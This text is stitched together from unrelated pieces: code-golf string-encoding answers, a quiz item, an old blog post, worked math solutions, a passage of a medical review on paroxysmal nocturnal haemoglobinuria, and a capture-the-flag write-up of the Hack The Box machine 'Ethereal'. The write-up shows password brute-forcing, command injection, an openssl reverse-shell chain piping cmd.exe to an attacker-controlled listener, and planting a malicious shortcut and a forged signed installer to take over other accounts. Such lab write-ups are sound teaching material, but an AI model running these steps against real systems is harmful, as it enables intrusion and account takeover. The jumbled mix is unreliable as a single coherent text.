• Single-char strings are 1 to 95
• Two-char strings are 96 to 9025, etc.
• G: undoes g, converts an integer to an (encoded) string.
• Main function: Unnamed lambda b,s:b and G(f(s))or F(g(s)): Uses the boolean b to determine whether to encode G(f(s)) or decode F(g(s)) the string, and does so.
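For readers who'd rather not untangle the golfed lambdas, here is an un-golfed sketch of the same index-mapping idea (the function names are mine, not from the answer):

```python
CHARSET = [chr(c) for c in range(32, 127)]  # the 95 allowed characters

def str_to_index(s):
    # Position of s among all strings, sorted by length then lexicographically.
    n = 0
    for ch in reversed(s):
        n = 95 * n + (ord(ch) - 31)
    return n

def index_to_str(n):
    # Inverse of str_to_index (bijective base 95).
    out = []
    while n:
        n, r = divmod(n - 1, 95)
        out.append(chr(r + 32))
    return ''.join(out)

def perm_to_index(s, avail=None):
    # Position of s among repeat-free strings, same ordering.
    avail = CHARSET if avail is None else avail
    if not s:
        return 0
    i = avail.index(s[0])
    return 1 + i + len(avail) * perm_to_index(s[1:], avail[:i] + avail[i + 1:])

def index_to_perm(n, avail=None):
    # Inverse of perm_to_index: the available character set shrinks as we go.
    avail = CHARSET if avail is None else avail
    if not n:
        return ''
    n, r = divmod(n - 1, len(avail))
    return avail[r] + index_to_perm(n, avail[:r] + avail[r + 1:])

def encode(s):
    return index_to_perm(str_to_index(s))

def decode(s):
    return index_to_str(perm_to_index(s))
```

Any normal string of up to 75 characters round-trips: `decode(encode(s)) == s`, and `encode(s)` never repeats a character.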
# Charcoal, 94 bytes
≔⁰ζ¿N«≔γδ≔¹εFS«≧⁺×ε⊕⌕γιζ≧×Lγε≔Φγ¬⁼κιγ»Wζ«§δ⊖ζ≔÷⊖ζ⁹⁵ζ»»«F⮌S≔⁺×⁹⁵ζ⊕⌕γιζWζ«≦⊖ζ§γζ≔Φγ¬⁼κ§γζγ≧÷⊕Lγζ
Try it online! Link is to verbose version of code. Explanation:
≔⁰ζ
Set z, which represents the permutation index, to zero, as both sides of the condition need it.
¿N«
If the first input (as a number) is non-zero, then we're doing decoding.
≔γδ
Save a copy of the predefined ASCII character set g in d, as we need to change it.
≔¹ε
Assign 1 to e. This represents the place value of each encoded character.
FS«
Loop over the encoded characters.
≧⁺×ε⊕⌕γιζ
Update the permutation index.
≧×Lγε
Update e with the place value of the next encoded character.
≔Φγ¬⁼κιγ»
Remove the character from the encoding set.
Wζ«
Repeat while the permutation number is non-zero.
§δ⊖ζ
Print the next decoded character.
≔÷⊖ζ⁹⁵ζ»»
Divide the bijective representation by 95. This completes decoding.
«F⮌S
Loop over the plain text in reverse, to avoid having to calculate the powers of 95.
≔⁺×⁹⁵ζ⊕⌕γιζ
Convert the plain text as bijective base 95 to the permutation index.
Wζ«
Repeat while the permutation index is non-zero.
≦⊖ζ
Decrement the permutation index.
§γζ
Print the next encoded character.
≔Φγ¬⁼κ§γζγ
Remove that character from the encoding set.
≧÷⊕Lγζ
Divide the permutation index by the previous length of the encoding set.
# Haskell
After fixing the bug noticed by Anders Kaseorg, the program unfortunately grew larger.
(x:y)?f|f x=(0,x)|0<1=(p+1,q)where(p,q)=y?f
a!n=take n a++drop(n+1)a
x#f=fst$f?(x==)
a x y z=y!!(q z-1)+b z s x
b[]_ _=0
b(x:y)f c=u(x#f)+v f*(b y(c f x)c)
c=const
e=divMod
f n|n<2=1|1<2=n*f(n-1)
g y z x=h(x-r)l s y where(l,r)=z?(x<)
h n l f c|l<1=[]|0<1=f!!w m:h d(l-1)(c f m)c where(d,m)=n`e`v f
i=r(k^)
k=95
o=r(\x->f k`div`f(k-x))
q=length
r f=scanl(+)0$map f[1..k]
s=[' '..'~']
u=toInteger
w=fromInteger
v=u.q
x=g(\a->(\b->a!w b))o.a c i
y=g c i.a(\a->(\b->a!(b#a)))o
Try it online!
Use x "Hello World" to encode and y "TR_z" to decode.
## How?
We can enumerate all possible input sequences and all possible encoded sequences, so the encoding is rather simple:
1) determine the number for the input sequence; 2) construct the output sequence corresponding to that number.
(The decoding is done in the reverse order).
## Explanation
This is an original (pre-golf) version for ease of understanding.
-- for ord
import Data.Char
-- all possible characters
s = [' ' .. '~']
-- get the first position in a list where the predicate returns True
(x:y) `firstPosWhere` fn
  | fn x = 0
  | 0<1 = 1 + (y `firstPosWhere` fn)
-- the same as above but return both the position and the list element
(x:y) `firstPosAndElemWhere` fn
  | fn x = (0, x)
  | 0 < 1 = (p + 1, q) where (p, q) = y `firstPosAndElemWhere` fn
-- the sets of numbers corresponding to input strings and to encoded strings are divided into ranges
inputRanges = scanl (+) 0 [95 ^ x | x <- [1..95]]
outputRanges = scanl (+) 0 [fac 95 `div` fac (95 - x) | x <- [1..95]]
-- convert an input string into a number
toN s = inputRanges !! (length s - 1) + toN' s
toN' [] = 0
toN' (x:y) = toInteger (ord x - 32) + 95 * toN' y
-- convert a number into an (unencoded) string
fromN n = fromN' (n - r) l where
  (l, r) = inputRanges `firstPosAndElemWhere` (n <)
fromN' n l
  | l < 1 = []
  | 0 < 1 = s !! fromInteger m : fromN' d (l - 1) where
    (d, m) = n `divMod` 95
-- factorial
fac n|n<2=1|1<2=n*fac(n-1)
-- remove nth element from a list
a `without` n = take n a ++ drop (n + 1) a
-- construct an encoded string corresponding to a number
encode n = encode' (n - r) l s where
  (l, r) = outputRanges `firstPosAndElemWhere` (n <)
encode' n l f
  | l < 1 = []
  | otherwise = (f !! m') : encode' d (l - 1) (f `without` m') where
    (d, m) = n `divMod` (toInteger $ length f)
    m' = fromInteger m

-- convert an encoded string back into a number
decode z = r + decode' z s where
  r = outputRanges !! (length z - 1)
decode' [] _ = 0
decode' (x:y) f = toInteger p + (toInteger $ length f) * (decode' y (f `without` p)) where
  p = f `firstPosWhere` (x ==)
• ('~' <$ [1..75]) ## 0 gives a division by zero exception. (The string of ~s in your tests is only 65 long, and the string you label as “Longer Than 75” isn’t.) – Anders Kaseorg Sep 8 '18 at 1:26
# Clean, 182 bytes
import StdEnv,Data.List
$b s=hd[v\\(u,v)<-if(b)id flip zip2(iterate?[])[[]:[p\\i<-inits[' '..'~'],t<-tails i,p<-permutations t|p>[]]]|u==s]
?[h:t]|h<'~'=[inc h:t]=[' ': ?t]
?[]=[' ']
Try it online!
Enumerates every valid encoding and every valid message, returning one or the other depending on the order of the arguments zip2 receives. Explained:
$b s // function$ of flag b and string s is
= hd [ // the first element in the list of
v // the value v
\\ (u, v) <- // for every pair of u and v from
if(b) // if b is true
id // do nothing
flip // otherwise, flip the arguments to
zip2 // a function which creates pairs applied to
(iterate ? []) // repeated application of ? to []
[[]: [ // prepend [] to
p // the value p
\\ i <- inits [' '..'~'] // for every prefix i in the character set
, t <- tails i // for every suffix t of i
, p <- permutations t // for every permutation of the characters in t
| p > [] // where p isn't empty
]]
| u == s // where the second element u equals s
]
? [h: t] // function ? of a list
| h < '~' // if the first element isn't a tilde
= [inc h: t] // increment it and return the list
= [' ': ? t] // otherwise change it to a space
? [] // function ? when the list is empty
= [' '] // return a singleton list with a space
It's really, really slow! Faster (in practice) version below (but with similar time complexity):
import StdEnv,Data.List,Data.Func,StdStrictLists,StdOverloadedList
increment :: [Char] -> [Char]
increment []
= [' ']
increment ['~':t]
= [' ':increment t]
increment [h:t]
= [inc h:t]
chars =: hyperstrict [' '..'~']
? :: *Bool [Char] -> [Char]
? b s
= let
i :: *[[Char]]
i = inits (chars)
t :: *[[Char]]
t = filter (not o isEmpty) (concatMap tails i)
p :: *[[Char]]
p = concatMap permutations t
in (if(b) encode decode) [] [[]:p]
where
encode :: [Char] *[[Char]] -> [Char]
encode d l
| d == s
= Hd l
| otherwise
= encode (increment d) (Tl l)
decode :: [Char] *[[Char]] -> [Char]
decode d l
| Hd l == s
= d
| otherwise
= decode (increment d) (Tl l)
Try it online!
|
|
# While Rosa is taking classes at the local community college to earn her degree in landscaping, she works part-time as a florist's assistant. This part-time work is an example of _____. a. a career b. telecommuting c. a job d. outsourcing
###### Question:
While Rosa is taking classes at the local community college to earn her degree in landscaping, she works part-time as a florist's assistant. This part-time work is an example of _____. a. a career b. telecommuting c. a job d. outsourcing
|
|
## Archive for April, 2007
### The problems with this site
April 20, 2007
1. In order to get this posting facility to operate in a way I like, I need to enter the following into adblock: *wordpress.com/wp-includes/js/tinymce/tiny_mce*
2. The $\LaTeX$ is not directly copy-and-pastable into standard $\LaTeX$. This is not good. The dollar symbol should be strictly reserved for mathematical typesetting. As if anyone would be so base as to actually want to write about real currency.
In other news, I have uploaded a proof of a combinatorial identity to my website.
I’ve moved here, since this site supports $\LaTeX$. I discovered this after looking at the blog of Terry Tao. It is still an unresolved conjecture as to whether or not this site will be updated with greater frequency than my previous blog.
|
|
# Hack The Box - Ethereal
## Quick Summary
Hey guys, today Ethereal retired and here is my write-up about it. As the difficulty says, it's insane! The most annoying part about this box is that it was very hard to enumerate, because we only get a blind RCE, and the firewall rules made it even harder because they only allowed TCP connections on 2 ports. It was fun and annoying at the same time, but I liked it. It's a Windows box and its IP is 10.10.10.106; I added it to /etc/hosts as ethereal.htb. Let's jump right in!
## Nmap
As always we will start with nmap to scan for open ports and services :
nmap -sV -sT -sC ethereal.htb
And we get FTP on port 21 and HTTP on ports 80 and 8080. It also tells us that FTP anonymous authentication is allowed. As always, we will enumerate HTTP first.
## HTTP Initial Enumeration
On port 80 we see this website :
The only interesting thing is that in the menu we see an Admin-area:
Clicking on that, we get redirected to this page, which has some other options: Notes, Messages, Desktop and Ping:
By going to notes we only get this:
So now we know that there's a "test connection" page somewhere, and we also get a potential username: alan. Clicking on messages we get nothing, but desktop:
And it's very clear that this is fake; the user.txt is also a troll:
By clicking on ping we get redirected to port 8080, which asks us for authentication using HTTP basic auth:
So now we know what's on port 8080: the "Test Connection" page. But we need credentials to access it.
One more thing to check is subdirectory enumeration with gobuster or any alternative:
gobuster only found /corp with the wordlist /usr/share/wordlists/dirb/common.txt, and that's the subdirectory that had the admin stuff. We can't get any more info and there's nothing to exploit, so the next thing to look at is FTP.
## FTP Enumeration
On FTP there are some files, but the most interesting ones are FDISK.zip and DISK.zip, so we will check them first:
We will unzip them:
Then we will check what kind of files we have with file:
Most likely they are mountable disks, so we will create a directory to mount them and call it mnt, then make a directory for disk1, disk2 and fdisk, and finally mount them with mount -o loop [Disk] [Directory]:
In disk1 and disk2 there are some files that are not very interesting:
But on fdisk there's a directory called pbox:
It contains an executable called pbox.exe and a dat file called pbox.dat:
## Getting Credentials
We will switch to a Windows box to run that executable; you can alternatively use wine or a program called dosbox. wine didn't work for me, and dosbox kept crashing every 15 seconds.
When we try to open it, it asks for a password:
At this point the only option I had was to guess the password, because I didn't know how to bruteforce it in this case. However, the password was "password" :D, so no bruteforce is needed, just a quick guess. After we get in, we see this password database:
databases :
msdn :
learning :
ftp drop :
backup :
truecrypt :
management server :
svn :
Back to our kali , now we can create a list with all the information we got :
I put the passwords in a separate list to bruteforce the http auth with it :
We will use wfuzz and we will try the username alan first :
wfuzz -u http://ethereal.htb:8080 --basic alan:FUZZ -w passwords.txt
Password : !C414m17y57r1k3s4g41n!
## Blind RCE
Now after we login we get the “Test Connection” page and we have an input for the ip address to ping.
Now we can try to bypass that and inject system commands using & or |, but we don't get any output. I also tried to host nc.exe on a Python HTTP server and use certutil to download it, but the Python server didn't get any requests. Finally, when I ran responder:
I finally got something:
We can try to execute a system command and get its output by doing this:
This executes whoami, then takes the output and does an nslookup with it to our IP:
We get etherealalan, which is unusual, as we expected ethereal\alan.
We will start enumerating the filesystem this way; read this if you don't understand some of the for commands that we will use.
So the current directory is c:\windows\system32\inetsrv
We also need to know the users on the box :
We have 5 users on the box: alan, jorge, Public, rupal and Administrator. We are executing commands as alan.
The next thing to look at is the installed programs:
We notice that OpenSSL is installed, which is unusual. We also need to know why we can't make the box connect back to us, so we will check the firewall rules. In our case the easiest way to do this is to execute the command, keep only the lines containing the string Rule Name:, redirect that output to a file, and then read that file, which is what we are doing. But first we need to find a place we can write to. After some attempts I could write to c:\users\public\desktop\shortcuts, so we will do this:
Then we will list the contents of c:\users\public\desktop\shortcuts:
And we see that we have successfully written into that directory. The next step is to read the file:
It's only allowing TCP connections to ports 73 and 136. We saw earlier that OpenSSL is installed on the box; we can create SSL/TLS servers on these ports and use openssl to make the box connect back to us.
## Generating certs and setting up the server
The first step is to generate certificates, because we need them to set up the server:
Then we will split our terminal and run 2 servers, one on port 73 and the other on port 136:
We are setting up 2 servers because we are going to use openssl on the box to connect to port 73 and take our input, pipe that input to cmd.exe, and then pipe the output to our server on port 136.
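The exact commands aren't shown in the screenshots; a minimal equivalent of the certificate and listener setup might look like this (the flags and CN are my choices, not necessarily what was used on the box):

```shell
# Self-signed certificate and key in one shot, no passphrase prompt.
openssl req -x509 -newkey rsa:2048 -nodes -days 365 \
  -subj "/CN=ethereal" -keyout key.pem -out cert.pem

# Then, one listener per terminal (shown here, not executed):
#   openssl s_server -quiet -key key.pem -cert cert.pem -port 73
#   openssl s_server -quiet -key key.pem -cert cert.pem -port 136
```

On the box, the injected ping payload then chains the two listeners through cmd.exe, roughly `openssl.exe s_client -quiet -connect <your-ip>:73 | cmd.exe | openssl.exe s_client -quiet -connect <your-ip>:136` (IP illustrative).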
Now we need to locate openssl.exe. If we list the contents of OpenSSL-v1.1.0 in Program Files (x86) (which can also be written Progra~2, check this), we get this output:
We see a directory called bin; that's where openssl.exe is located, so the full path is c:\progra~2\OpenSSL-v1.1.0\bin\openssl.exe
Now everything is ready; on the ping page we will write this:
Then we will check our server:
Now we will type the commands on the first server (port 73), then refresh the ping page to send the POST request again (this pipes our input from port 73 to cmd.exe and then to the server on port 136), and we will get our output on the second server.
alan's desktop doesn't have the flag, so we need to escalate to another user. There's a note on alan's desktop in a file called note-draft.txt:
## Creating a malicious lnk and getting User
From the note we learned that there's a lnk on Public's desktop and that other users on the box are using it.
So if we replace it with a payload, we can get a shell as another user. There's a tool on GitHub called LNKup; I used it to create the payload:
To upload it, we will close one of the servers and run it again, but this time we will redirect the lnk file into it:
Then on the ping page we will type this:
We will close the server, run the 2 servers again, and get our shell as alan like we did before. Then we will delete the original lnk and copy ours over with the old lnk's name:
Then we will close the 2 servers, run them again and wait for someone to execute the lnk file; after a minute we will get a shell as jorge:
With this we don’t need to refresh any pages because the connection is not handled by the ping page anymore so the command will be piped immediately from the first server to the second server.
Finally, we owned user!
## More Filesystem Enumeration
If we check the other drives:
fsutil fsinfo drives
We will find that C is not the only drive; there's also D.
Unfortunately, anyone who starts enumerating without doing this important step in Windows enumeration won't get anything.
Contents of D:
In DEV there’s a directory called MSIs and it has a note :
So we have to create a malicious msi and place it there to get a shell as rupal. We also need the certs to sign the msi; they are found in D:\Certs as MyCA.cer and MyCA.pvk. To transfer them to our box, we will use openssl to base64-encode the certs, then copy and decode them on our box.
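The base64 transfer can be sketched as a local round trip (stand-in data; the commented command is roughly what you'd run on the target):

```shell
# On the target (blind) you'd run something like:
#   c:\progra~2\OpenSSL-v1.1.0\bin\openssl.exe base64 -in d:\Certs\MyCA.cer
# and copy the printed text. Locally, decoding restores the exact bytes:
printf 'stand-in certificate bytes' > MyCA.cer   # placeholder for the real cert
openssl base64 -in MyCA.cer -out MyCA.b64
openssl base64 -d -in MyCA.b64 -out MyCA.dec
cmp MyCA.cer MyCA.dec    # identical -> the transfer is lossless
```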
Now we will go to a windows box again to create the msi
## Creating Malicious msi and getting root
In order to create the msi we will use wixtools; you can use other msi builders, but they didn't work for me.
We will create an msi that executes our lnk file:
We will use candle.exe from wixtools to create a wixobject from msi.xml:
Then we will use light.exe to create the msi file from the wixobject:
After that we need tools from the Microsoft SDK to sign our msi. First we will use makecert.exe to create new certs from the original certs we got from the box:
Then we will use pvk2pfx.exe to create a pfx from the cer and pvk files:
And finally we will use signtool.exe to sign the msi with the pfx :
Now back to our kali, we will upload the msi the same way we uploaded the lnk file before. We also need to make sure that the lnk file is in c:\users\public\desktop\shortcuts\, because the msi just executes that lnk. We will put the msi into D:\DEV\MSIs.
Then we will close the servers, run them again and wait around 3-5 minutes until rupal opens the msi.
And we got root!
That’s it , Feedback is appreciated !
|
|
Christopher B.
passionate about the field of mathematics
Linear Algebra
TutorMe
Question:
Does the given $$2\times2$$ matrix have an inverse? $$\begin{bmatrix} 3 & 6 \\ 2 & 4 \end{bmatrix}$$
Christopher B.
Recall that a matrix has an inverse if and only if it is nonsingular, i.e., the determinant of the matrix is not equal to zero. To determine if this matrix has an inverse, we can find the determinant. If the determinant is zero, the matrix does not have an inverse; otherwise, it does. The determinant of a $$2\times 2$$ matrix of the form $$\begin{bmatrix} a & b \\ c & d \end{bmatrix}$$ is given by $$(a)(d)-(c)(b)$$. Thus, the determinant of the given matrix is $$(3)(4) - (2)(6) = 12 - 12 = 0$$ Since the determinant of the given matrix is zero, it is singular, and thus does not have an inverse.
Trigonometry
Question:
Use one of the sum or difference identities for sine and cosine to find the exact value of $$\csc \left(\frac{3\pi}{2} \right)$$
Christopher B.
One way to solve this problem is to rewrite the cosecant function in terms of sine and use the sine-of-sum identity. As $$\csc x = 1/\sin x$$, the given expression becomes $$\frac{1}{\sin \left( \frac{3\pi}{2}\right)}$$ Rewriting $$\frac{3\pi}{2}$$ as $$\frac{2\pi}{2} + \frac{\pi}{2}$$, we get $$\frac{1}{\sin \left( \frac{2\pi}{2} + \frac{\pi}{2}\right)}$$ Recalling the sine-of-sum identity, $$\sin \left( a+b \right) = \sin (a) \cos (b) + \cos (a) \sin (b)$$, we have $$\frac{1}{\sin \left(\pi\right) \cos \left(\frac{\pi}{2}\right) + \cos \left(\pi\right) \sin \left(\frac{\pi}{2}\right)} = \frac{1}{\left(0\right) \left(0\right) + \left(-1\right) \left(1\right)} = \frac{1}{0-1} = \frac{1}{-1} = \boxed{-1}$$
Calculus
Question:
Evaluate the integral $$\int_0^e \ln x^2 \, dx$$
Christopher B.
Using the power rule for logarithms, we can re-write $$\ln x^2$$ as $$2 \ln x$$. Now the given integral becomes $$\int_0^e 2 \ln x\, dx$$ Since $$2$$ is a constant, we can pull it out of the integral. This gives us $$2\int_0^e \ln x \, dx$$ We can now solve the integral using integration by parts. Recalling that the formula for integration by parts is $$\int_a^b u\, dv = \left. uv \right\vert_a^b - \int_a^b v\, du$$, we can let $$u= \ln x$$ and $$dv = dx$$. This gives $$du = \frac{1}{x}\, dx$$ and $$v = x$$. Thus, $$2\int_0^e \ln x \, dx = 2 \left[ \left. x\ln x \right\vert_0^e - \int_0^e \frac{x}{x}\, dx \right] = 2 \left[ \left. x\ln x \right\vert_0^e - \left. x \right\vert_0^e \right] = 2 \left[ \left(e \ln e - 0\right) - \left( e-0 \right) \right] = 2 \left(e \ln e - e \right) = 2 \left(e - e \right) = \boxed{0}$$ since $$\ln e = 1$$.
|
|
Paroxysmal nocturnal haemoglobinuria: Nature's gene therapy?
1. R J Johnson1,
2. P Hillmen2
1. 1Department of Haematology, Birmingham Heartlands Hospital, Bordesley Green East, Birmingham B9 5SS, UK
2. 2Haematological Malignancy Diagnostic Service, The General Infirmary at Leeds, Great George Street, Leeds LS1 3EX, UK
1. Correspondence to:
Dr R J Johnson, Birmingham Heartlands Hospital, Bordesley Green East, Birmingham B9 5SS, UK;
johnsonr{at}heartsol.wmids.nhs.uk
## Abstract
The development of paroxysmal nocturnal haemoglobinuria (PNH) requires two coincident factors: somatic mutation of the PIG-A gene in one or more haemopoietic stem cells and an abnormal, hypoplastic bone marrow environment. When both of these conditions are met, the fledgling PNH clone may flourish. This review will discuss the pathophysiology of this disease, which has recently been elucidated in some detail.
• paroxysmal nocturnal haemoglobinuria
• PIG-A gene
• aplastic anaemia
• AA, aplastic anaemia
• ER, endoplasmic reticulum
• GPI, glycosyl phosphatidylinositol
• GlcNAc, N-acetylglucosamine
• PEA, phosphoethanolamine
• PI, phosphatidylinositol
• PNH, paroxysmal nocturnal haemoglobinuria
• VSG, variant surface glycoprotein
The development of paroxysmal nocturnal haemoglobinuria (PNH) requires two coincident factors: somatic mutation of the PIG-A gene in one or more haemopoietic stem cells and an abnormal, hypoplastic bone marrow environment. When both of these conditions are met, the PNH clone may flourish. Recently, the pathophysiology of this disease has been elucidated in some detail and we now have rational theories concerning the clinical manifestations of PNH, its association with other haematological disorders (such as aplasia and myelodysplasia), and the sequence of events that leads to overt disease. Spontaneous somatic mutations are common in the PIG-A gene, leading to failure of synthesis of the glycosyl phosphatidylinositol (GPI) anchor. Without this structure, many proteins are unable to attach to cell surfaces. Red blood cells lose complement defence proteins, which explains the classic feature of intravascular complement mediated haemolysis. There is indirect evidence that platelet activation with consequent thrombosis is caused by a similar mechanism. The relative growth advantage of PNH cells in a hypoplastic marrow is also, presumably, a direct or indirect result of these alterations in surface antigen composition, although the precise pathophysiological mechanisms remain to be described. It is probable that the association with aplasia is explained by this relative growth advantage and that clonal evolution to a leukaemic state is a consequence of the primary insult causing the aplasia. In this way, PNH can be seen as an attempt to restore a form of useful, if abnormal, haemopoiesis in a damaged bone marrow: nature's gene therapy.
## THE EVOLUTION OF OUR UNDERSTANDING OF PNH
PNH as a clinical entity has puzzled physicians and scientists for 200 years. Perhaps the first description was “An account of a singular periodic discharge of blood from the urethra” written in 1794 by a Scottish surgeon, Charles Stewart. However, the first detailed description is credited to Paul Strübing in 1882.1 His patient had a six year history of passing dark urine intermittently in the mornings, always clearing by noon. His conclusions were detailed and astonishingly perceptive, suggesting as he did that there was intravascular haemolysis and that some of the patient's symptoms were the result of thrombosis. He even concluded (correctly) that a red blood cell defect was to blame. Despite this insight, the work was largely ignored and when Marchiafava reported a case in Italy 29 years later it was regarded as a new entity.2 Michelli published further observations in 1931 and used the weighty term “splenomegalic haemolytic anaemia with haemoglobinuria and haemosiderinuria, Marchiafava–Michelli type” from which the disease retains the eponym.3 The modern term PNH was first coined shortly before Michelli's paper in a description of a case from the Netherlands.4
Attempts to explain the haemolysis began in Rotterdam in 1911, when Hijmans van den Bergh noted that PNH erythrocytes were sensitive to lysis in vitro when exposed to carbon dioxide.5 By the 1930s it had been shown that the lysis was complement mediated and pH dependent: being greatest in acidified conditions.6 This formed the basis for Ham's test,7 which was the diagnostic gold standard until its replacement by flow cytometry in recent years.
In 1944, Sir John Dacie first noted the association of PNH with aplasia in a case of Fanconi's anaemia.8 In the 1950s, the defect was shown to be present in other haemopoietic lineages, with the observation that the neutrophil alkaline phosphatase was reduced or absent in PNH.9 This led Dacie to suggest that PNH was an acquired clonal disorder arising in a haemopoietic stem cell.10 This important and perceptive idea was later confirmed by an elegant report in two patients with PNH who were also heterozygous for the enzyme glucose-6-phosphate dehydrogenase.11 In this study, it was shown that the patients' red cells with a PNH phenotype contained only one isotype of glucose-6-phosphate dehydrogenase whereas their residual, non-PNH cells contained both.
“Ham's test was the diagnostic gold standard until its replacement by flow cytometry in recent years”
From the 1960s onwards, an increasing number of proteins were shown to be missing from the cell surface in PNH. These included molecules known to be involved in the regulation of complement at cell surfaces. It was hypothesised that their absence caused a complement mediated intravascular haemolysis. Decay accelerating factor (DAF/CD55), which has a role in the inactivation of complement at an early stage of the cascade, was thought to be important but individuals with the Inab red cell phenotype, who have an inherited DAF deficiency, had no clinical illness or in vitro red cell complement sensitivity.12 CD59, which inhibits the formation of the membrane attack complex (the final step in the complement cascade) was the next candidate. Clinical evidence for the importance of this molecule came in 1992 when a 22 year old man was described who had a homozygous deficiency of CD59 on all his cells and suffered PNH-like symptoms, with haemolysis and cerebral thrombosis.13 It is probable that the haemolytic and thrombotic features of PNH are mediated by complement sensitivity and that CD59 deficiency is an important cause of this.
The biochemical explanation for the absence of these proteins became clear when the GPI anchor was described as a novel mechanism of attachment of antigens to cells in 1980.14 It was subsequently shown that all the proteins absent in PNH were GPI linked and that all GPI linked antigens are missing from PNH cells. In the past decade, the structure and biochemistry of the GPI anchor have been described and there is a consistent biosynthetic abnormality in all patients with PNH described to date.15
A gene whose cDNA is able to correct this defect in all transfected human cell lines has now been cloned.16 It is situated on the short arm of the X chromosome and has been named PIG-A, a term derived from its ability to restore the GPI synthetic defect in class A murine cell lines.17 Since the gene has been cloned, mutations have been found in all patient samples reported.18
This sequence of historical milestones has taken PNH from its most obvious clinical manifestation right back to a single gene defect in a haemopoietic stem cell. The story is in one sense complete but there are still many intriguing questions to be answered.
## CLINICAL ASPECTS OF PNH
### Epidemiology
PNH is a rare disease. One of the largest epidemiological studies looked back at data from French centres from 1946 to 1995 and found only 220 reported cases.19 The annual incidence is about 4/million and the overall frequency is probably similar to that of aplastic anaemia (AA) with which it has a close association. It is probable that greater awareness and improved diagnostic methods will increase the number of diagnosed cases. The UK PNH registry in Leeds has been collecting new and existing cases since 1990 and currently has over 140 recorded patients (P Hillmen, personal observation, 2001).
### Clinical features
Patients with PNH may have a long term chronic illness but the disease does shorten life. The median survival from diagnosis was 10 to 15 years in two large historical studies.19, 20 Patients most commonly die of thrombosis or progressive cytopenias. Leukaemic transformation is uncommon (< 5%). Many patients will continue to have intermittent paroxysms of haemolysis but some eventually achieve a spontaneous remission.20 The identification of patients destined to remit is clearly an important requirement to prevent the use of toxic treatments in patients with a good prognosis.
Haemolysis is the cardinal feature. It is classically paroxysmal and most apparent in the first urine passed on waking—hence the name of the disease. In practice, patients often have a chronic haemolysis with exacerbations. This results in a variable transfusion requirement with iron deficiency often contributing to the anaemia. All patients should receive daily folic acid, because a low degree of haemolysis is usual between paroxysms. Heavily transfused patients can, paradoxically, become iron overloaded and this should be monitored to avoid compounding the problem with iron supplements.
Thrombosis is the most feared complication. There is a well established predilection for the hepatic veins but a diversity of predominantly venous sites has been described. Patients with AA and only laboratory evidence of PNH are much less likely to suffer a thrombosis than those with active haemolysis and a large proportion of PNH cells in their blood. In this last group, thrombosis may occur in up to 50% and be the cause of death in one third.19, 20
The intimate connection between AA and PNH is underlined by the clinical course of the illness in individual patients. Some degree of cytopenia is a consistent finding, even in haemolytic PNH. This may range from a mild reduction in one cell lineage to life threatening bone marrow failure. Even when blood counts are normal, bone marrow examination and progenitor culture assays reveal impaired haemopoiesis.
Malignancy, such as myelodysplasia or acute myeloid leukaemia, supervenes in around 5% of cases, but is probably a result of the process leading to AA rather than a specific risk related to the PNH clone itself, which is not considered preleukaemic.21, 22
### Diagnosis
The demonstration of non-immune haemolysis with haemosiderinuria should lead to an investigation for PNH. Alternatively, its presence may be sought because of AA or a venous thrombosis at an unusual anatomical site. The diagnosis is definitively established by the demonstration of GPI linked protein deficiencies on red blood cell and neutrophil surfaces by multiparameter flow cytometry.23 The Ham test has been largely abandoned where flow cytometry is available, because it is relatively insensitive and labour intensive and only gives information on red blood cells. The solid phase gel techniques used for antibody detection in blood transfusion provide a rapid screen but again are limited to red blood cell antigens. The proportion of affected red blood cells often gives a falsely low assessment of the true clone size because of the effects of the selective haemolysis of PNH red cells compared with their normal counterparts and because of the effect of transfusion. The neutrophil series is not affected by these variables and therefore allows an accurate measurement of the clone size. It is possible to detect PNH clones that comprise < 1% of neutrophils using multiparameter flow cytometry.24 It is important to include a transmembrane antigen as a lineage marker (for example, CD15 for neutrophils) and at least two GPI linked antigens (for example, CD55 and CD59) to exclude the rare inherited deficiencies of single antigens such as the Inab phenotype (CD55 deficiency).
“It is probable that the haemolytic and thrombotic features of paroxysmal nocturnal haemoglobinuria are mediated by complement sensitivity and that CD59 deficiency is an important cause of this”
Using flow cytometry, it is possible to demonstrate patterns of complete or partial GPI linked protein deficiency on the red blood cell series. Normal cells are designated type I, partially deficient type II, and completely deficient type III (fig 1). The clinical severity of the disease is directly related to the proportion of type III red blood cells.
Figure 1
An example of peripheral blood phenotyping in paroxysmal nocturnal haemoglobinuria (PNH). Plots from a flow cytometer showing the clear discrimination between populations of normal and PNH cells in a patient's peripheral blood sample. (A,B) Plots showing the three types of red blood cells that can be detected in these patients. Type I cells are normal, type II are partially deficient in glycosyl phosphatidylinositol (GPI) linked proteins, and type III are wholly deficient. CD55 and CD59 are GPI linked antigens found on red blood cells. (C) Plot showing granulocytes that have been dual stained with two GPI linked surface antigens (CD16 and CD66) in a patient with PNH. This clearly delineates the normal and the PNH cells. (D) Plot using the same double staining method but with antigens relevant to monocytes (CD64 and CD14): the same clear demarcation is shown. Courtesy of Dr S Richards, Haematological Malignancy Diagnostic Service, The General Infirmary, Leeds, UK.
If these techniques are applied to other haemopoietic cell lineages, GPI deficiency can be documented on platelets, monocytes, and lymphocytes, confirming the stem cell nature of the disorder25 (fig 1).
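The type I/II/III classification described above is, in effect, a pair of fluorescence thresholds applied per cell. As a purely illustrative sketch (this is not the authors' analysis pipeline; the thresholds, intensity units, and function names are invented for illustration), the gating logic might look like this:

```python
# Hypothetical illustration of PNH red-cell typing from a GPI-linked
# antigen signal (e.g. CD59 fluorescence, arbitrary units).
# All cutoff values below are invented, not clinical thresholds.

def classify_red_cell(cd59_intensity, normal_cutoff=100.0, deficient_cutoff=10.0):
    """Return the PNH red-cell type for a single flow-cytometry event.

    Type I   : normal CD59 expression
    Type II  : partial GPI-linked protein deficiency
    Type III : complete deficiency
    """
    if cd59_intensity >= normal_cutoff:
        return "I"
    elif cd59_intensity >= deficient_cutoff:
        return "II"
    else:
        return "III"

def type_iii_fraction(intensities):
    """Fraction of events that are completely GPI deficient (type III)."""
    types = [classify_red_cell(x) for x in intensities]
    return types.count("III") / len(types)

# A toy sample: 90 normal cells, a small type II population, and a
# small type III clone.
sample = [250.0] * 90 + [40.0] * 4 + [2.0] * 6
print(type_iii_fraction(sample))  # 0.06
```

In practice, as the text notes, red-cell percentages underestimate the true clone size because of selective haemolysis and transfusion, which is why neutrophil phenotyping is preferred for quantification.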
### Treatment
